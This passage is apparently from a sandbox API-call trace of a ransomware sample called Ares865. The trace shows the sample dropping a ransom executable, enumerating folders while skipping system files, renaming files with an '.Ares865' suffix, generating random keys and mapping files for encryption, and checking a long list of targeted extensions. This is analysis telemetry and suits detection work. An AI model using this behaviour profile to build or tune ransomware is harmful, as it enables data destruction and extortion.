(lpString=".sys") returned 4 [0042.150] lstrcmpiW (lpString1="09_Music_played_the_most.wpl", lpString2=".sys") returned 1 [0042.150] lstrlenW (lpString="09_Music_played_the_most.wpl") returned 28 [0042.151] lstrcpyW (in: lpString1=0x2e2e914, lpString2="10_All_Music.wpl" | out: lpString1="10_All_Music.wpl") returned="10_All_Music.wpl" [0042.151] lstrlenW (lpString="10_All_Music.wpl") returned 16 [0042.151] lstrlenW (lpString="Ares865") returned 7 [0042.151] lstrcmpiW (lpString1="sic.wpl", lpString2="Ares865") returned 1 [0042.151] lstrlenW (lpString=".dll") returned 4 [0042.151] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2=".dll") returned 1 [0042.151] lstrlenW (lpString=".lnk") returned 4 [0042.151] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2=".lnk") returned 1 [0042.151] lstrlenW (lpString=".ini") returned 4 [0042.151] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2=".ini") returned 1 [0042.151] lstrlenW (lpString=".sys") returned 4 [0042.151] lstrcmpiW (lpString1="10_All_Music.wpl", lpString2=".sys") returned 1 [0042.151] lstrlenW (lpString="10_All_Music.wpl") returned 16 [0042.151] lstrcpyW (in: lpString1=0x2e2e914, lpString2="11_All_Pictures.wpl" | out: lpString1="11_All_Pictures.wpl") returned="11_All_Pictures.wpl" [0042.151] lstrlenW (lpString="11_All_Pictures.wpl") returned 19 [0042.151] lstrlenW (lpString="Ares865") returned 7 [0042.151] lstrcmpiW (lpString1="res.wpl", lpString2="Ares865") returned 1 [0042.151] lstrlenW (lpString=".dll") returned 4 [0042.151] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2=".dll") returned 1 [0042.151] lstrlenW (lpString=".lnk") returned 4 [0042.151] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2=".lnk") returned 1 [0042.151] lstrlenW (lpString=".ini") returned 4 [0042.151] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2=".ini") returned 1 [0042.151] lstrlenW (lpString=".sys") returned 4 [0042.151] lstrcmpiW (lpString1="11_All_Pictures.wpl", lpString2=".sys") returned 1 [0042.151] lstrlenW (lpString="11_All_Pictures.wpl") returned 19 [0042.151] lstrcpyW (in: lpString1=0x2e2e914, lpString2="12_All_Video.wpl" | out: lpString1="12_All_Video.wpl") returned="12_All_Video.wpl" [0042.151] lstrlenW (lpString="12_All_Video.wpl") returned 16 [0042.151] lstrlenW (lpString="Ares865") returned 7 [0042.152] lstrcmpiW (lpString1="deo.wpl", lpString2="Ares865") returned 1 [0042.152] lstrlenW (lpString=".dll") returned 4 [0042.152] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2=".dll") returned 1 [0042.152] lstrlenW (lpString=".lnk") returned 4 [0042.152] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2=".lnk") returned 1 [0042.152] lstrlenW (lpString=".ini") returned 4 [0042.152] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2=".ini") returned 1 [0042.152] lstrlenW (lpString=".sys") returned 4 [0042.152] lstrcmpiW (lpString1="12_All_Video.wpl", lpString2=".sys") returned 1 [0042.152] lstrlenW (lpString="12_All_Video.wpl") returned 16 [0042.152] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer" [0042.152] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0042.152] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0042.152] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer") returned 64 [0042.152] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer" [0042.152] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.152] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 1 [0042.165] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.165] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.165] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.165] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0042.165] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0042.165] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.165] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.165] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0042.165] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0042.165] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0042.165] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff12e0f2, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x2fa9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brndlog.bak", cAlternateFileName="")) returned 1 [0042.165] lstrcmpiW (lpString1="brndlog.bak", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2="aoldtz.exe") returned 1 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2=".") returned 1 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2="..") returned 1 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2="windows") returned -1 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2="bootmgr") returned 1 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2="temp") returned -1 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2="pagefile.sys") returned -1 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2="boot") returned 1 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2="ids.txt") returned -1 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2="ntuser.dat") returned -1 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2="perflogs") returned -1 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2="MSBuild") returned -1 [0042.166] lstrlenW (lpString="brndlog.bak") returned 11 [0042.166] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\*") returned 66 [0042.166] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="brndlog.bak" | out: lpString1="brndlog.bak") returned="brndlog.bak" [0042.166] lstrlenW (lpString="brndlog.bak") returned 11 [0042.166] lstrlenW (lpString="Ares865") returned 7 [0042.166] lstrcmpiW (lpString1="log.bak", lpString2="Ares865") returned 1 [0042.166] lstrlenW (lpString=".dll") returned 4 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2=".dll") returned 1 [0042.166] lstrlenW (lpString=".lnk") returned 4 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2=".lnk") returned 1 [0042.166] lstrlenW (lpString=".ini") returned 4 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2=".ini") returned 1 [0042.166] lstrlenW (lpString=".sys") returned 4 [0042.166] lstrcmpiW (lpString1="brndlog.bak", lpString2=".sys") returned 1 [0042.166] lstrlenW (lpString="brndlog.bak") returned 11 [0042.166] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\brndlog.bak.Ares865") returned 84 [0042.166] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\default user\\local settings\\microsoft\\internet explorer\\brndlog.bak"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\brndlog.bak.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\internet explorer\\brndlog.bak.ares865"), dwFlags=0x1) returned 1 [0042.173] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\brndlog.bak.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\internet explorer\\brndlog.bak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0042.173] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=12201) returned 1 [0042.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x35a0020 [0042.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb400 [0042.173] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0042.173] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0042.174] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0042.174] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0042.174] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x32b0, lpName=0x0) returned 0x164 [0042.176] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x32b0) returned 0x190000 [0042.180] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0042.181] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0042.181] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0042.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0042.181] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0042.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cba28 [0042.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0042.181] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0042.181] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cba28 [0042.181] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0042.181] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0042.181] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0042.181] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0042.181] CloseHandle (hObject=0x164) returned 1 [0042.182] CloseHandle (hObject=0x118) returned 1 [0042.183] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb400 | out: hHeap=0x2b0000) returned 1 [0042.183] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0042.183] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x35a0020 | out: hHeap=0x2b0000) returned 1 [0042.183] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6666440, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6666440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb371c2, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x2fa9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brndlog.txt", cAlternateFileName="")) returned 1 [0042.183] lstrcmpiW (lpString1="brndlog.txt", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0042.183] lstrcmpiW (lpString1="brndlog.txt", lpString2="aoldtz.exe") returned 1 [0042.183] lstrcmpiW (lpString1="brndlog.txt", lpString2=".") returned 1 [0042.183] lstrcmpiW (lpString1="brndlog.txt", lpString2="..") returned 1 [0042.183] lstrcmpiW (lpString1="brndlog.txt", lpString2="windows") returned -1 [0042.184] lstrcmpiW (lpString1="brndlog.txt", lpString2="bootmgr") returned 1 [0042.184] lstrcmpiW (lpString1="brndlog.txt", lpString2="temp") returned -1 [0042.184] lstrcmpiW (lpString1="brndlog.txt", lpString2="pagefile.sys") returned -1 [0042.184] lstrcmpiW (lpString1="brndlog.txt", lpString2="boot") returned 1 [0042.184] lstrcmpiW (lpString1="brndlog.txt", lpString2="ids.txt") returned -1 [0042.184] lstrcmpiW (lpString1="brndlog.txt", lpString2="ntuser.dat") returned -1 [0042.184] lstrcmpiW (lpString1="brndlog.txt", lpString2="perflogs") returned -1 [0042.184] lstrcmpiW (lpString1="brndlog.txt", lpString2="MSBuild") returned -1 [0042.184] lstrlenW (lpString="brndlog.txt") returned 11 [0042.184] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Internet Explorer\\brndlog.bak") returned 76 [0042.184] lstrcpyW (in: lpString1=0x2e2e8e2, lpString2="brndlog.txt" | out: lpString1="brndlog.txt") returned="brndlog.txt" [0042.184] lstrlenW (lpString="brndlog.txt") returned 11 [0042.184] lstrlenW (lpString="Ares865") returned 7 [0042.184] lstrcmpiW (lpString1="log.txt", lpString2="Ares865") returned 1 [0042.184] lstrlenW (lpString=".dll") returned 4 [0042.184] lstrcmpiW (lpString1="brndlog.txt", lpString2=".dll") returned 1 [0042.184] lstrlenW (lpString=".lnk") returned 4 [0042.184] lstrcmpiW (lpString1="brndlog.txt", lpString2=".lnk") returned 1 [0042.184] lstrlenW (lpString=".ini") returned 4 [0042.184] lstrcmpiW (lpString1="brndlog.txt", lpString2=".ini") returned 1 [0042.184] lstrlenW (lpString=".sys") returned 4 [0042.184] lstrcmpiW (lpString1="brndlog.txt", lpString2=".sys") returned 1 [0042.184] lstrlenW (lpString="brndlog.txt") returned 11 [0042.184] lstrlenW (lpString="bak") returned 3 [0042.184] lstrcmpiW (lpString1="txt", lpString2="bak") returned 1 [0042.184] lstrlenW (lpString="ba_") returned 3 [0042.184] lstrcmpiW (lpString1="txt", lpString2="ba_") returned 1 [0042.184] lstrlenW (lpString="dbb") returned 3 [0042.184] lstrcmpiW (lpString1="txt", lpString2="dbb") returned 1 [0042.184] lstrlenW (lpString="vmdk") returned 4 [0042.184] lstrcmpiW (lpString1=".txt", lpString2="vmdk") returned -1 [0042.184] lstrlenW (lpString="rar") returned 3 [0042.184] lstrcmpiW (lpString1="txt", lpString2="rar") returned 1 [0042.184] lstrlenW (lpString="zip") returned 3 [0042.185] lstrcmpiW (lpString1="txt", lpString2="zip") returned -1 [0042.185] lstrlenW (lpString="tgz") returned 3 [0042.185] lstrcmpiW (lpString1="txt", lpString2="tgz") returned 1 [0042.185] lstrlenW (lpString="vbox") returned 4 [0042.185] lstrcmpiW (lpString1=".txt", lpString2="vbox") returned -1 [0042.185] lstrlenW (lpString="vdi") returned 3 [0042.185] lstrcmpiW (lpString1="txt", lpString2="vdi") returned -1 [0042.185] lstrlenW (lpString="vhd") returned 3 [0042.185] lstrcmpiW (lpString1="txt", lpString2="vhd") returned -1 [0042.185] lstrlenW (lpString="vhdx") returned 4 [0042.185] lstrcmpiW (lpString1=".txt", lpString2="vhdx") returned -1 [0042.185] lstrlenW (lpString="avhd") returned 4 [0042.185] lstrcmpiW (lpString1=".txt", lpString2="avhd") returned -1 [0042.185] lstrlenW (lpString="db") returned 2 [0042.185] lstrcmpiW (lpString1="xt", lpString2="db") returned 1 [0042.185] lstrlenW (lpString="db2") returned 3 [0042.185] lstrcmpiW (lpString1="txt", lpString2="db2") returned 1 [0042.185] lstrlenW (lpString="db3") returned 3 [0042.185] lstrcmpiW (lpString1="txt", lpString2="db3") returned 1 [0042.185] lstrlenW (lpString="dbf") returned 3 [0042.185] lstrcmpiW (lpString1="txt", lpString2="dbf") returned 1 [0042.185] lstrlenW (lpString="mdf") returned 3 [0042.185] lstrcmpiW (lpString1="txt", lpString2="mdf") returned 1 [0042.185] lstrlenW (lpString="mdb") returned 3 [0042.185] lstrcmpiW (lpString1="txt", lpString2="mdb") returned 1 [0042.185] lstrlenW (lpString="sql") returned 3 [0042.185] lstrcmpiW (lpString1="txt", lpString2="sql") returned 1 [0042.185] lstrlenW (lpString="sqlite") returned 6 [0042.185] lstrcmpiW (lpString1="og.txt", lpString2="sqlite") returned -1 [0042.185] lstrlenW (lpString="sqlite3") returned 7 [0042.185] lstrcmpiW (lpString1="log.txt", lpString2="sqlite3") returned -1 [0042.185] lstrlenW (lpString="sqlitedb") returned 8 [0042.185] lstrcmpiW (lpString1="dlog.txt", lpString2="sqlitedb") returned -1 [0042.185] lstrlenW (lpString="xml") returned 3 [0042.185] lstrcmpiW (lpString1="txt", lpString2="xml") returned -1 [0042.186] lstrlenW (lpString="$er") returned 3 [0042.186] lstrcmpiW (lpString1="txt", lpString2="$er") returned 1 [0042.186] lstrlenW (lpString="4dd") returned 3 [0042.186] lstrcmpiW (lpString1="txt", lpString2="4dd") returned 1 [0042.186] lstrlenW (lpString="4dl") returned 3 [0042.186] lstrcmpiW (lpString1="txt", lpString2="4dl") returned 1 [0042.186] lstrlenW (lpString="^^^") returned 3 [0042.186] lstrcmpiW (lpString1="txt", lpString2="^^^") returned 1 [0042.186] lstrlenW (lpString="abs") returned 3 [0042.186] lstrcmpiW (lpString1="txt", lpString2="abs") returned 1 [0042.186] lstrlenW (lpString="abx") returned 3 [0042.186] lstrcmpiW (lpString1="txt", lpString2="abx") returned 1 [0042.186] lstrlenW (lpString="accdb") returned 5 [0042.186] lstrcmpiW (lpString1="g.txt", lpString2="accdb") returned 1 [0042.186] lstrlenW (lpString="accdc") returned 5 [0042.186] lstrcmpiW (lpString1="g.txt", lpString2="accdc") returned 1 [0042.186] lstrlenW (lpString="accde") returned 5 [0042.186] lstrcmpiW (lpString1="g.txt", lpString2="accde") returned 1 [0042.186] lstrlenW (lpString="accdr") returned 5 [0042.186] lstrcmpiW (lpString1="g.txt", lpString2="accdr") returned 1 [0042.186] lstrlenW (lpString="accdt") returned 5 [0042.186] lstrcmpiW (lpString1="g.txt", lpString2="accdt") returned 1 [0042.186] lstrlenW (lpString="accdw") returned 5 [0042.186] lstrcmpiW (lpString1="g.txt", lpString2="accdw") returned 1 [0042.186] lstrlenW (lpString="accft") returned 5 [0042.186] lstrcmpiW (lpString1="g.txt", lpString2="accft") returned 1 [0042.186] lstrlenW (lpString="adb") returned 3 [0042.186] lstrcmpiW (lpString1="txt", lpString2="adb") returned 1 [0042.186] lstrlenW (lpString="adb") returned 3 [0042.186] lstrcmpiW (lpString1="txt", lpString2="adb") returned 1 [0042.186] lstrlenW (lpString="ade") returned 3 [0042.186] lstrcmpiW (lpString1="txt", lpString2="ade") returned 1 [0042.186] lstrlenW (lpString="adf") returned 3 [0042.186] lstrcmpiW (lpString1="txt", lpString2="adf") returned 1 [0042.186] lstrlenW (lpString="adn") returned 3 [0042.187] lstrcmpiW (lpString1="txt", lpString2="adn") returned 1 [0042.187] lstrlenW (lpString="adp") returned 3 [0042.187] lstrcmpiW (lpString1="txt", lpString2="adp") returned 1 [0042.187] lstrlenW (lpString="alf") returned 3 [0042.187] lstrcmpiW (lpString1="txt", lpString2="alf") returned 1 [0042.187] lstrlenW (lpString="ask") returned 3 [0042.187] lstrcmpiW (lpString1="txt", lpString2="ask") returned 1 [0042.187] lstrlenW (lpString="btr") returned 3 [0042.187] lstrcmpiW (lpString1="txt", lpString2="btr") returned 1 [0042.187] lstrlenW (lpString="cat") returned 3 [0042.187] lstrcmpiW (lpString1="txt", lpString2="cat") returned 1 [0042.187] lstrlenW (lpString="cdb") returned 3 [0042.187] lstrcmpiW (lpString1="txt", lpString2="cdb") returned 1 [0042.187] lstrlenW (lpString="ckp") returned 3 [0042.187] lstrcmpiW (lpString1="txt", lpString2="ckp") returned 1 [0042.187] lstrlenW (lpString="cma") returned 3 [0042.187] lstrcmpiW (lpString1="txt", lpString2="cma") returned 1 [0042.187] lstrlenW (lpString="cpd") returned 3 [0042.187] lstrcmpiW (lpString1="txt", lpString2="cpd") returned 1 [0042.187] lstrlenW (lpString="dacpac") returned 6 [0042.187] lstrcmpiW (lpString1="og.txt", lpString2="dacpac") returned 1 [0042.187] lstrlenW (lpString="dad") returned 3 [0042.187] lstrcmpiW (lpString1="txt", lpString2="dad") returned 1 [0042.187] lstrlenW (lpString="dadiagrams") returned 10 [0042.187] lstrcmpiW (lpString1="rndlog.txt", lpString2="dadiagrams") returned 1 [0042.187] lstrlenW (lpString="daschema") returned 8 [0042.187] lstrcmpiW (lpString1="dlog.txt", lpString2="daschema") returned 1 [0042.187] lstrlenW (lpString="db-journal") returned 10 [0042.187] lstrcmpiW (lpString1="rndlog.txt", lpString2="db-journal") returned 1 [0042.187] lstrlenW (lpString="db-shm") returned 6 [0042.187] lstrcmpiW (lpString1="og.txt", lpString2="db-shm") returned 1 [0042.187] lstrlenW (lpString="db-wal") returned 6 [0042.187] lstrcmpiW (lpString1="og.txt", lpString2="db-wal") returned 1 [0042.187] lstrlenW (lpString="dbc") returned 3 [0042.187] lstrcmpiW (lpString1="txt", lpString2="dbc") returned 1 [0042.188] lstrlenW (lpString="dbs") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="dbs") returned 1 [0042.188] lstrlenW (lpString="dbt") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="dbt") returned 1 [0042.188] lstrlenW (lpString="dbv") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="dbv") returned 1 [0042.188] lstrlenW (lpString="dbx") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="dbx") returned 1 [0042.188] lstrlenW (lpString="dcb") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="dcb") returned 1 [0042.188] lstrlenW (lpString="dct") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="dct") returned 1 [0042.188] lstrlenW (lpString="dcx") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="dcx") returned 1 [0042.188] lstrlenW (lpString="ddl") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="ddl") returned 1 [0042.188] lstrlenW (lpString="dlis") returned 4 [0042.188] lstrcmpiW (lpString1=".txt", lpString2="dlis") returned -1 [0042.188] lstrlenW (lpString="dp1") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="dp1") returned 1 [0042.188] lstrlenW (lpString="dqy") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="dqy") returned 1 [0042.188] lstrlenW (lpString="dsk") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="dsk") returned 1 [0042.188] lstrlenW (lpString="dsn") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="dsn") returned 1 [0042.188] lstrlenW (lpString="dtsx") returned 4 [0042.188] lstrcmpiW (lpString1=".txt", lpString2="dtsx") returned -1 [0042.188] lstrlenW (lpString="dxl") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="dxl") returned 1 [0042.188] lstrlenW (lpString="eco") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="eco") returned 1 [0042.188] lstrlenW (lpString="ecx") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="ecx") returned 1 [0042.188] lstrlenW (lpString="edb") returned 3 [0042.188] lstrcmpiW (lpString1="txt", lpString2="edb") returned 1 [0042.189] lstrlenW (lpString="epim") returned 4 [0042.189] lstrcmpiW (lpString1=".txt", lpString2="epim") returned -1 [0042.189] lstrlenW (lpString="fcd") returned 3 [0042.189] lstrcmpiW (lpString1="txt", lpString2="fcd") returned 1 [0042.189] lstrlenW (lpString="fdb") returned 3 [0042.189] lstrcmpiW (lpString1="txt", lpString2="fdb") returned 1 [0042.189] lstrlenW (lpString="fic") returned 3 [0042.189] lstrcmpiW (lpString1="txt", lpString2="fic") returned 1 [0042.189] lstrlenW (lpString="flexolibrary") returned 12 [0042.189] lstrlenW (lpString="fm5") returned 3 [0042.189] lstrcmpiW (lpString1="txt", lpString2="fm5") returned 1 [0042.189] lstrlenW (lpString="fmp") returned 3 [0042.189] lstrcmpiW (lpString1="txt", lpString2="fmp") returned 1 [0042.189] lstrlenW (lpString="fmp12") returned 5 [0042.189] lstrcmpiW (lpString1="g.txt", lpString2="fmp12") returned 1 [0042.189] lstrlenW (lpString="fmpsl") returned 5 [0042.189] lstrcmpiW (lpString1="g.txt", lpString2="fmpsl") returned 1 [0042.189] lstrlenW (lpString="fol") returned 3 [0042.189] lstrcmpiW (lpString1="txt", lpString2="fol") returned 1 [0042.189] lstrlenW (lpString="fp3") returned 3 [0042.189] lstrcmpiW (lpString1="txt", lpString2="fp3") returned 1 [0042.189] lstrlenW (lpString="fp4") returned 3 [0042.189] lstrcmpiW (lpString1="txt", lpString2="fp4") returned 1 [0042.189] lstrlenW (lpString="fp5") returned 3 [0042.189] lstrcmpiW (lpString1="txt", lpString2="fp5") returned 1 [0042.189] lstrlenW (lpString="fp7") returned 3 [0042.189] lstrcmpiW (lpString1="txt", lpString2="fp7") returned 1 [0042.189] lstrlenW (lpString="fpt") returned 3 [0042.189] lstrcmpiW (lpString1="txt", lpString2="fpt") returned 1 [0042.189] lstrlenW (lpString="frm") returned 3 [0042.189] lstrcmpiW (lpString1="txt", lpString2="frm") returned 1 [0042.189] lstrlenW (lpString="gdb") returned 3 [0042.189] lstrcmpiW (lpString1="txt", lpString2="gdb") returned 1 [0042.189] lstrlenW (lpString="gdb") returned 3 [0042.189] lstrcmpiW (lpString1="txt", lpString2="gdb") returned 1 [0042.189] lstrlenW (lpString="grdb") returned 4 [0042.190] lstrcmpiW (lpString1=".txt", lpString2="grdb") returned -1 [0042.190] lstrlenW (lpString="gwi") returned 3 [0042.190] lstrcmpiW (lpString1="txt", lpString2="gwi") returned 1 [0042.190] lstrlenW (lpString="hdb") returned 3 [0042.190] lstrcmpiW (lpString1="txt", lpString2="hdb") returned 1 [0042.190] lstrlenW (lpString="his") returned 3 [0042.190] lstrcmpiW (lpString1="txt", lpString2="his") returned 1 [0042.190] lstrlenW (lpString="ib") returned 2 [0042.190] lstrcmpiW (lpString1="xt", lpString2="ib") returned 1 [0042.190] lstrlenW (lpString="idb") returned 3 [0042.190] lstrcmpiW (lpString1="txt", lpString2="idb") returned 1 [0042.190] lstrlenW (lpString="ihx") returned 3 